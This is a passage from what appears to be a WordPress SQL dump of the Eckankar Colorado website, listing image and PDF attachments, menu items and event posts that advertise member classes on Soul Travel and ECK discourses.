80222<br>\r\n<a href=\"https://eckankar-colorado.org/contact-us/\">contact@eckankar-colorado.org</a><br>\r\n303-756-9287</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Privacy Policy','','publish','closed','closed','','privacy-policy','','','2022-11-26 11:48:56','2022-11-26 18:48:56','',0,'https://eckankar-colorado.org/?page_id=181536',0,'page','',0),(181893,2,'2019-10-10 12:26:45','2019-10-10 18:26:45','','eck-privacy-1','','inherit','closed','closed','','eck-privacy-1','','','2019-10-10 12:26:45','2019-10-10 18:26:45','',181536,'https://eckankar-colorado.org/wp-content/uploads/2019/10/eck-privacy-1.jpg',0,'attachment','image/jpeg',0),(184289,2,'2019-10-11 15:51:57','2019-10-11 21:51:57','','RESA Org Chart 9.22.18','','inherit','closed','closed','','resa-org-chart-9-22-18','','','2020-04-12 12:44:22','2020-04-12 18:44:22','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/RESA-Org-Chart-9.22.18.pdf',0,'attachment','application/pdf',0),(184313,2,'2019-10-11 16:18:30','2019-10-11 22:18:30','','RESA and ETC Org Charts','','inherit','closed','closed','','resa-and-etc-org-charts','','','2020-04-12 12:57:01','2020-04-12 18:57:01','',261549,'https://eckankar-colorado.org/wp-content/uploads/2019/10/RESA-and-ETC-Org-Charts.pdf',0,'attachment','application/pdf',0),(198737,2,'2019-10-21 23:28:27','2019-10-22 05:28:27','','blue-books-butterfly','','inherit','closed','closed','','blue-books-butterfly','','','2019-10-21 23:28:27','2019-10-22 05:28:27','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/blue-books-butterfly.jpg',0,'attachment','image/jpeg',0),(198738,2,'2019-10-21 23:28:28','2019-10-22 05:28:28','','blue-moon','','inherit','closed','closed','','blue-moon','','','2019-10-21 23:28:28','2019-10-22 05:28:28','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/blue-moon.jpg',0,'attachment','image/jpeg',0),(198739,2,'2019-10-21 23:28:30','2019-10-22 05:28:30','','boy-leaning-watching','','inherit','closed','closed','','boy-leaning-watching','','','2019-10-21 23:28:30','2019-10-22 05:28:30','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/boy-leaning-watching.jpg',0,'attachment','image/jpeg',0),(198740,2,'2019-10-21 23:28:32','2019-10-22 05:28:32','','daisy-key','','inherit','closed','closed','','daisy-key','','','2019-10-21 23:28:32','2019-10-22 05:28:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/daisy-key.jpg',0,'attachment','image/jpeg',0),(198741,2,'2019-10-21 23:28:34','2019-10-22 05:28:34','','flower-stump','','inherit','closed','closed','','flower-stump','','','2019-10-21 23:28:34','2019-10-22 05:28:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/flower-stump.jpg',0,'attachment','image/jpeg',0),(198742,2,'2019-10-21 23:28:35','2019-10-22 05:28:35','','flower-water','','inherit','closed','closed','','flower-water','','','2019-10-21 23:28:35','2019-10-22 05:28:35','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/flower-water.jpg',0,'attachment','image/jpeg',0),(198743,2,'2019-10-21 23:28:37','2019-10-22 05:28:37','','forest-light','','inherit','closed','closed','','forest-light','','','2019-10-21 23:28:37','2019-10-22 05:28:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/forest-light.jpg',0,'attachment','image/jpeg',0),(198744,2,'2019-10-21 23:28:39','2019-10-22 05:28:39','','kitty-flower','','inherit','closed','closed','','kitty-flower','','','2019-10-21 23:28:39','2019-10-22 05:28:39','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/kitty-flower.jpg',0,'attachment','image/jpeg',0),(198745,2,'2019-10-21 23:28:41','2019-10-22 05:28:41','','lake-bench','','inherit','closed','closed','','lake-bench','','','2019-10-21 23:28:41','2019-10-22 05:28:41','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/lake-bench.jpg',0,'attachment','image/jpeg',0),(198746,2,'2019-10-21 23:28:43','2019-10-22 05:28:43','','leaves-sphere','','inherit','closed','closed','','leaves-sphere','','','2019-10-21 23:28:43','2019-10-22 05:28:43','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/leaves-sphere.jpg',0,'attachment','image/jpeg',0),(198748,2,'2019-10-21 23:28:46','2019-10-22 05:28:46','','purple-tree','','inherit','closed','closed','','purple-tree','','','2019-10-21 23:28:46','2019-10-22 05:28:46','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/purple-tree.jpg',0,'attachment','image/jpeg',0),(198749,2,'2019-10-21 23:28:48','2019-10-22 05:28:48','','seashell-ocean','','inherit','closed','closed','','seashell-ocean','','','2019-10-21 23:28:48','2019-10-22 05:28:48','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/seashell-ocean.jpg',0,'attachment','image/jpeg',0),(198750,2,'2019-10-21 23:28:49','2019-10-22 05:28:49','','sphere-nature','','inherit','closed','closed','','sphere-nature','','','2019-10-21 23:28:49','2019-10-22 05:28:49','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/sphere-nature.jpg',0,'attachment','image/jpeg',0),(198751,2,'2019-10-21 23:28:51','2019-10-22 05:28:51','','starfish-dancing','','inherit','closed','closed','','starfish-dancing','','','2019-10-21 23:28:51','2019-10-22 05:28:51','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/starfish-dancing.jpg',0,'attachment','image/jpeg',0),(198752,2,'2019-10-21 23:28:52','2019-10-22 05:28:52','','tiny-tree-in-glass','','inherit','closed','closed','','tiny-tree-in-glass','','','2019-10-21 23:28:52','2019-10-22 05:28:52','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/tiny-tree-in-glass.jpg',0,'attachment','image/jpeg',0),(198776,2,'2019-10-21 23:28:56','2019-10-22 05:28:56','','tree-blue-lake','','inherit','closed','closed','','tree-blue-lake','','','2019-10-21 23:28:56','2019-10-22 05:28:56','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/tree-blue-lake.jpg',0,'attachment','image/jpeg',0),(198800,2,'2019-10-21 23:50:58','2019-10-22 05:50:58','','harold-bg-tabs-A','','inherit','closed','closed','','harold-bg-tabs-a','','','2019-10-21 23:50:58','2019-10-22 05:50:58','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-bg-tabs-A.jpg',0,'attachment','image/jpeg',0),(198801,2,'2019-10-21 23:51:01','2019-10-22 05:51:01','','harold-bg-tabs-B','','inherit','closed','closed','','harold-bg-tabs-b','','','2019-10-21 23:51:01','2019-10-22 05:51:01','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-bg-tabs-B.jpg',0,'attachment','image/jpeg',0),(198802,2,'2019-10-21 23:51:03','2019-10-22 05:51:03','','harold-bg-tabs-C','','inherit','closed','closed','','harold-bg-tabs-c','','','2019-10-21 23:51:03','2019-10-22 05:51:03','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-bg-tabs-C.jpg',0,'attachment','image/jpeg',0),(198803,2,'2019-10-21 23:51:06','2019-10-22 05:51:06','','harold-bg-tabs-D','','inherit','closed','closed','','harold-bg-tabs-d','','','2019-10-21 23:51:06','2019-10-22 05:51:06','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-bg-tabs-D.jpg',0,'attachment','image/jpeg',0),(198804,2,'2019-10-21 23:51:08','2019-10-22 05:51:08','','harold-bg-tabs-E','','inherit','closed','closed','','harold-bg-tabs-e','','','2019-10-21 23:51:08','2019-10-22 05:51:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-bg-tabs-E.jpg',0,'attachment','image/jpeg',0),(198805,2,'2019-10-21 23:51:11','2019-10-22 05:51:11','','harold-bg-tabs-F','','inherit','closed','closed','','harold-bg-tabs-f','','','2019-10-21 23:51:11','2019-10-22 05:51:11','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-bg-tabs-F.jpg',0,'attachment','image/jpeg',0),(198806,2,'2019-10-21 23:51:13','2019-10-22 05:51:13','','harold-bg-tabs-G','','inherit','closed','closed','','harold-bg-tabs-g','','','2019-10-21 23:51:13','2019-10-22 05:51:13','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-bg-tabs-G.jpg',0,'attachment','image/jpeg',0),(198807,2,'2019-10-21 23:51:15','2019-10-22 05:51:15','','harold-klemp-smtabs','','inherit','closed','closed','','harold-klemp-smtabs-2','','','2019-10-21 23:51:15','2019-10-22 05:51:15','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/harold-klemp-smtabs-1.jpg',0,'attachment','image/jpeg',0),(198903,2,'2019-10-24 14:56:14','2019-10-24 20:56:14','','island-heart','','inherit','closed','closed','','island-heart','','','2019-10-24 14:56:14','2019-10-24 20:56:14','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/island-heart.jpg',0,'attachment','image/jpeg',0),(198904,2,'2019-10-24 14:56:17','2019-10-24 20:56:17','','orange-flowers','','inherit','closed','closed','','orange-flowers','','','2019-10-24 14:56:17','2019-10-24 20:56:17','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/orange-flowers.jpg',0,'attachment','image/jpeg',0),(198905,2,'2019-10-24 14:56:21','2019-10-24 20:56:21','','poppy-field','','inherit','closed','closed','','poppy-field','','','2019-10-24 14:56:21','2019-10-24 20:56:21','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/poppy-field.jpg',0,'attachment','image/jpeg',0),(198976,2,'2019-10-24 15:12:16','2019-10-24 21:12:16','','butterfly-tulips','','inherit','closed','closed','','butterfly-tulips','','','2019-10-24 15:12:16','2019-10-24 21:12:16','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/butterfly-tulips.jpg',0,'attachment','image/jpeg',0),(198977,2,'2019-10-24 15:12:19','2019-10-24 21:12:19','','sphere-nature','','inherit','closed','closed','','sphere-nature-2','','','2019-10-24 15:12:19','2019-10-24 21:12:19','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/sphere-nature-1.jpg',0,'attachment','image/jpeg',0),(198978,2,'2019-10-24 15:12:22','2019-10-24 21:12:22','','white-puppies','','inherit','closed','closed','','white-puppies','','','2019-10-24 15:12:22','2019-10-24 21:12:22','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/white-puppies.jpg',0,'attachment','image/jpeg',0),(198979,2,'2019-10-24 15:12:26','2019-10-24 21:12:26','','wooden-bridge','','inherit','closed','closed','','wooden-bridge','','','2019-10-24 15:12:26','2019-10-24 21:12:26','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/10/wooden-bridge.jpg',0,'attachment','image/jpeg',0),(201534,2,'2019-12-18 14:28:17','2019-12-18 21:28:17','<p><span style=\"color: #f28a27; font-size: 16pt;\">\"Soul Travel 1—The Illuminated Way\" - Member Class<br />\r\n</span></p>\r\n<p><span style=\"color: #484848;\"><strong>This Class Is Available To Members Of Eckankar</strong></span></p>\r\n<p>ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. Each year-long discourse series is written by the spiritual leader of Eckankar. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</p>','Soul Travel 1—The Illuminated Way - Class','','publish','closed','closed','','soul-travel-1-the-illuminated-way-satsang-class','','','2020-12-02 15:24:28','2020-12-02 22:24:28','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=201534',0,'tribe_events','',0),(204589,2,'2019-12-12 11:01:07','2019-12-12 18:01:07','','co-EK-BGrid-logo-title-image','','inherit','closed','closed','','co-ek-bgrid-logo-title-image','','','2019-12-12 11:21:57','2019-12-12 18:21:57','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/12/co-EK-BGrid-logo-title-image.png',0,'attachment','image/png',0),(204591,2,'2019-12-12 11:15:21','2019-12-12 18:15:21','','favicon2','','inherit','closed','closed','','favicon2','','','2019-12-12 11:15:21','2019-12-12 18:15:21','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/12/favicon2.png',0,'attachment','image/png',0),(204592,2,'2019-12-12 11:15:38','2019-12-12 18:15:38','https://eckankar-colorado.org/wp-content/uploads/2019/12/cropped-favicon2.png','cropped-favicon2.png','','inherit','closed','closed','','cropped-favicon2-png','','','2019-12-12 11:15:38','2019-12-12 18:15:38','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/12/cropped-favicon2.png',0,'attachment','image/png',0),(204616,2,'2019-12-12 11:25:31','2019-12-12 18:25:31','','co-EK-BGrid-logo-title-image-lg','','inherit','closed','closed','','co-ek-bgrid-logo-title-image-lg','','','2019-12-12 11:25:31','2019-12-12 18:25:31','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/12/co-EK-BGrid-logo-title-image-lg.png',0,'attachment','image/png',0),(205232,2,'2019-12-12 14:45:35','2019-12-12 21:45:35','','eck-temple-member-cal-promo','','inherit','closed','closed','','eck-temple-member-cal-promo','','','2019-12-12 14:45:35','2019-12-12 21:45:35','',68102,'https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg',0,'attachment','image/jpeg',0),(210314,2,'2019-12-15 14:29:40','2019-12-15 21:29:40','','members-newsletter-bgrid-2','','inherit','closed','closed','','members-newsletter-bgrid-2','','','2019-12-15 14:29:40','2019-12-15 21:29:40','',68102,'https://eckankar-colorado.org/wp-content/uploads/2019/12/members-newsletter-bgrid-2.png',0,'attachment','image/png',0),(211084,2,'2019-12-15 15:18:39','2019-12-15 22:18:39','','members-newsletter-bgrid-4','','inherit','closed','closed','','members-newsletter-bgrid-4','','','2019-12-15 15:18:39','2019-12-15 22:18:39','',68102,'https://eckankar-colorado.org/wp-content/uploads/2019/12/members-newsletter-bgrid-4.png',0,'attachment','image/png',0),(213454,2,'2019-12-16 12:03:19','2019-12-16 19:03:19','','Colorado ECK Org Chart','','publish','closed','closed','do','colorado-eck-org-chart-sdm','','','2020-03-22 15:49:49','2020-03-22 21:49:49','',0,'https://eckankar-colorado.org/?post_type=sdm_downloads&#038;p=213454',0,'sdm_downloads','',0),(216537,2,'2019-12-16 14:27:47','2019-12-16 21:27:47','','Donation authorization form--12-2019--ch','','inherit','closed','closed','','donation-authorization-form-12-2019-ch','','','2019-12-16 14:27:47','2019-12-16 21:27:47','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf',0,'attachment','application/pdf',0),(225018,2,'2019-12-18 14:32:57','2019-12-18 21:32:57','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2 – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Soul Travel 2','','publish','closed','closed','','letters-of-light-and-sound-2','','','2021-01-14 12:49:30','2021-01-14 19:49:30','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=225018',0,'tribe_events','',0),(225135,2,'2019-12-18 14:36:10','2019-12-18 21:36:10','<p><span style=\"color: #f28a27; font-size: 16pt;\">\"The Precepts of ECKANKAR\" - Member Class<br />\r\n</span></p>\r\n<p><span style=\"color: #484848;\"><strong>This Class Is Available To Members Of Eckankar<br />\r\n</strong></span></p>\r\n<p>ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. Each year-long discourse series is written by the spiritual leader of Eckankar. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</p>','The Precepts of ECKANKAR - Class','','publish','closed','closed','','the-precepts-of-eckankar-class','','','2020-12-02 15:25:58','2020-12-02 22:25:58','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=225135',0,'tribe_events','',0),(225321,2,'2019-12-18 14:38:30','2019-12-18 21:38:30','<p><span style=\"color: #f28a27; font-size: 16pt;\">\"The ECK Dream 2 Discourses\" - Member Class<br />\r\n</span></p>\r\n<p><span style=\"color: #484848;\"><strong>This Class Is Available To Members Of Eckankar<br />\r\n</strong></span></p>\r\n<p>ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. Each year-long discourse series is written by the spiritual leader of Eckankar. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</p>','The ECK Dream 2 Discourses - Class','','publish','closed','closed','','the-eck-satsang-discourses-second-series-class','','','2020-12-02 15:22:40','2020-12-02 22:22:40','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=225321',0,'tribe_events','',0),(225693,2,'2019-12-18 14:59:33','2019-12-18 21:59:33','','Boulder Easy Way Class','','publish','closed','closed','','boulder-easy-way-class','','','2019-12-18 14:59:33','2019-12-18 21:59:33','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=225693',0,'tribe_venue','',0),(225786,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses','','','2020-12-16 10:23:18','2020-12-16 17:23:18','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=225786',0,'tribe_events','',0),(230895,2,'2019-12-20 10:37:41','2019-12-20 17:37:41','','co-EK-BGrid-logo-title-image-lg-3','','inherit','closed','closed','','co-ek-bgrid-logo-title-image-lg-3','','','2019-12-20 10:37:57','2019-12-20 17:37:57','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/12/co-EK-BGrid-logo-title-image-lg-3.png',0,'attachment','image/png',0),(231870,2,'2019-12-20 20:47:11','2019-12-21 03:47:11','','Donate Online','','publish','closed','closed','','donate-online','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=231870',20,'nav_menu_item','',0),(231871,2,'2019-12-20 20:47:11','2019-12-21 03:47:11','','Donate By Mail','','publish','closed','closed','','donate-by-mail','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=231871',21,'nav_menu_item','',0),(239970,2,'2019-12-29 20:11:23','2019-12-30 03:11:23','<p><span style=\"color: #f28a27; font-size: 16pt;\">\"The ECK Satsang Discourses, Second Series\"  - Member Class<br />\r\n</span></p>\r\n<p><span style=\"color: #484848;\"><strong>-This Class Is Available To Members Of Eckankar-<br />\r\n</strong></span></p>\r\n<p>ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. Each year-long discourse series is written by the spiritual leader of Eckankar. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</p>','The ECK Satsang Discourses, Second Series','','publish','closed','closed','','the-precepts-of-eckankar-class-2','','','2020-12-02 15:25:33','2020-12-02 22:25:33','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=239970',0,'tribe_events','',0),(242058,2,'2019-12-29 20:59:50','2019-12-30 03:59:50','<p><span style=\"font-size: 16pt; color: #f28a27;\">\"Spiritual Wisdom on ECK Leadership - Book 2\" -</span> <br />\r\nThis class will meet every First Sunday and is specifically for Higher Initiates.</p>','HI Class - Members','','publish','closed','closed','','hi-class-members','','','2020-12-04 10:03:26','2020-12-04 17:03:26','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=242058',0,'tribe_events','',0),(242994,2,'2020-01-12 20:36:21','2020-01-13 03:36:21','','about-background-sized','','inherit','closed','closed','','about-background-sized','','','2020-01-12 20:36:21','2020-01-13 03:36:21','',7162,'https://eckankar-colorado.org/wp-content/uploads/2020/01/about-background-sized.jpg',0,'attachment','image/jpeg',0),(243467,2,'2020-01-13 10:46:55','2020-01-13 17:46:55','','spex-sized','','inherit','closed','closed','','spex-sized','','','2020-01-13 10:47:10','2020-01-13 17:47:10','',7160,'https://eckankar-colorado.org/wp-content/uploads/2020/01/spex-sized.png',0,'attachment','image/png',0),(243468,2,'2020-01-13 10:48:20','2020-01-13 17:48:20','','eckco-meetups-sized','','inherit','closed','closed','','eckco-meetups-sized','','','2020-01-13 10:48:36','2020-01-13 17:48:36','',7160,'https://eckankar-colorado.org/wp-content/uploads/2020/01/eckco-meetups-sized.png',0,'attachment','image/png',0),(243613,2,'2020-01-13 11:04:27','2020-01-13 18:04:27','','co-EK-BGrid-logo-title-image-4','','inherit','closed','closed','','co-ek-bgrid-logo-title-image-4','','','2020-01-13 11:05:23','2020-01-13 18:05:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/co-EK-BGrid-logo-title-image-4.png',0,'attachment','image/png',0),(245088,2,'2020-01-13 15:09:08','2020-01-13 22:09:08','','activities-splash-sized','','inherit','closed','closed','','activities-splash-sized','','','2020-01-13 15:09:23','2020-01-13 22:09:23','',45842,'https://eckankar-colorado.org/wp-content/uploads/2020/01/activities-splash-sized.jpg',0,'attachment','image/jpeg',0),(247330,2,'2023-10-20 09:43:11','2020-01-14 21:11:27',' ','','','publish','closed','closed','','247330','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=247330',1,'nav_menu_item','',0),(247332,2,'2023-10-20 09:43:11','2020-01-14 21:11:27',' ','','','publish','closed','closed','','247332','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=247332',9,'nav_menu_item','',0),(247336,2,'2023-10-20 09:43:11','2020-01-14 21:11:27','','ECK Soul Adventure Events','','publish','closed','closed','','event-calendars-2','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=247336',2,'nav_menu_item','',0),(247342,2,'2023-10-20 09:43:11','2020-01-14 21:11:27',' ','','','publish','closed','closed','','247342','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=247342',12,'nav_menu_item','',0),(247343,2,'2023-10-20 09:43:11','2020-01-14 21:11:27',' ','','','publish','closed','closed','','247343','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=247343',14,'nav_menu_item','',0),(247344,2,'2023-10-20 09:43:11','2020-01-14 21:11:27',' ','','','publish','closed','closed','','247344','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=247344',15,'nav_menu_item','',0),(247345,2,'2023-10-20 09:43:11','2020-01-14 21:11:27','','About Events','','publish','closed','closed','','247345','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=247345',7,'nav_menu_item','',0),(247614,2,'2020-01-14 14:37:32','2020-01-14 21:37:32','','landscape-temple-1-sized','','inherit','closed','closed','','landscape-temple-1-sized','','','2020-01-14 14:38:00','2020-01-14 21:38:00','',31882,'https://eckankar-colorado.org/wp-content/uploads/2020/01/landscape-temple-1-sized.jpg',0,'attachment','image/jpeg',0),(247828,2,'2020-01-14 14:47:24','2020-01-14 21:47:24','','co-springs-location-landscape-sized','','inherit','closed','closed','','co-springs-location-landscape-sized','','','2020-01-14 14:47:41','2020-01-14 21:47:41','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/co-springs-location-landscape-sized.jpg',0,'attachment','image/jpeg',0),(247926,2,'2020-01-14 14:53:51','2020-01-14 21:53:51','','co-springs-location-sized','','inherit','closed','closed','','co-springs-location-sized','','','2020-01-14 14:54:04','2020-01-14 21:54:04','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/co-springs-location-sized.jpg',0,'attachment','image/jpeg',0),(248046,2,'2020-01-14 14:58:55','2020-01-14 21:58:55','','eck-temple-co-sized','','inherit','closed','closed','','eck-temple-co-sized','','','2020-01-14 14:59:05','2020-01-14 21:59:05','',31882,'https://eckankar-colorado.org/wp-content/uploads/2020/01/eck-temple-co-sized.jpg',0,'attachment','image/jpeg',0),(248165,2,'2020-01-14 15:04:47','2020-01-14 22:04:47','','loveland-landscape-sized','','inherit','closed','closed','','loveland-landscape-sized','','','2020-01-14 15:05:27','2020-01-14 22:05:27','',32074,'https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-landscape-sized.jpg',0,'attachment','image/jpeg',0),(248166,2,'2020-01-14 15:07:12','2020-01-14 22:07:12','','','','inherit','closed','closed','','olympus-digital-camera','','','2020-01-14 15:07:48','2020-01-14 22:07:48','',32074,'https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-center-location-sized.jpg',0,'attachment','image/jpeg',0),(248434,2,'2020-01-14 15:38:33','2020-01-14 22:38:33','','wslope-splashpix-FULL-SIZE','','inherit','closed','closed','','wslope-splashpix-full-size','','','2020-01-14 15:38:33','2020-01-14 22:38:33','',32170,'https://eckankar-colorado.org/wp-content/uploads/2020/01/wslope-splashpix-FULL-SIZE.jpg',0,'attachment','image/jpeg',0),(248630,2,'2020-01-14 15:50:44','2020-01-14 22:50:44','','wslope-oldmine-sized-3','','inherit','closed','closed','','wslope-oldmine-sized-3','','','2020-01-14 15:50:54','2020-01-14 22:50:54','',32170,'https://eckankar-colorado.org/wp-content/uploads/2020/01/wslope-oldmine-sized-3.jpg',0,'attachment','image/jpeg',0),(248842,2,'2020-01-14 16:33:00','2020-01-14 23:33:00','','wslope-balloons-sized-3','','inherit','closed','closed','','wslope-balloons-sized-3','','','2020-01-14 16:33:31','2020-01-14 23:33:31','',32170,'https://eckankar-colorado.org/wp-content/uploads/2020/01/wslope-balloons-sized-3.jpg',0,'attachment','image/jpeg',0),(249746,2,'2020-01-15 11:57:39','2020-01-15 18:57:39','','Youth in ECK--sized','','inherit','closed','closed','','youth-in-eck-sized','','','2020-01-15 11:57:50','2020-01-15 18:57:50','',151053,'https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg',0,'attachment','image/jpeg',0),(251919,2,'2020-01-15 16:00:07','2020-01-15 23:00:07','','wisdom-of-the-heart-book-2','','inherit','closed','closed','','wisdom-of-the-heart-book-2','','','2020-01-15 16:00:49','2020-01-15 23:00:49','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/wisdom-of-the-heart-book-2.jpg',0,'attachment','image/jpeg',0),(252359,2,'2020-01-16 11:07:38','2020-01-16 18:07:38','','cosprings-member-cal-promo','','inherit','closed','closed','','cosprings-member-cal-promo','','','2020-12-03 11:56:56','2020-12-03 18:56:56','',68102,'https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg',0,'attachment','image/jpeg',0),(252360,2,'2020-01-16 11:07:40','2020-01-16 18:07:40','','loveland-member-cal-promo','','inherit','closed','closed','','loveland-member-cal-promo','','','2020-01-16 11:07:40','2020-01-16 18:07:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg',0,'attachment','image/jpeg',0),(253344,2,'2020-01-16 12:57:56','2020-01-16 19:57:56','','ocean-bkgrnd-homepg','','inherit','closed','closed','','ocean-bkgrnd-homepg','','','2020-01-16 12:57:56','2020-01-16 19:57:56','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/ocean-bkgrnd-homepg.jpg',0,'attachment','image/jpeg',0),(253423,2,'2020-01-16 13:08:48','2020-01-16 20:08:48','','westslope-bkgnd-image','','inherit','closed','closed','','westslope-bkgnd-image','','','2020-01-16 13:08:48','2020-01-16 20:08:48','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/westslope-bkgnd-image.jpg',0,'attachment','image/jpeg',0),(254444,2,'2020-01-18 14:56:42','2020-01-18 21:56:42','','hu-sos-bgrid-sized','','inherit','closed','closed','','hu-sos-bgrid-sized','','','2020-01-18 14:56:42','2020-01-18 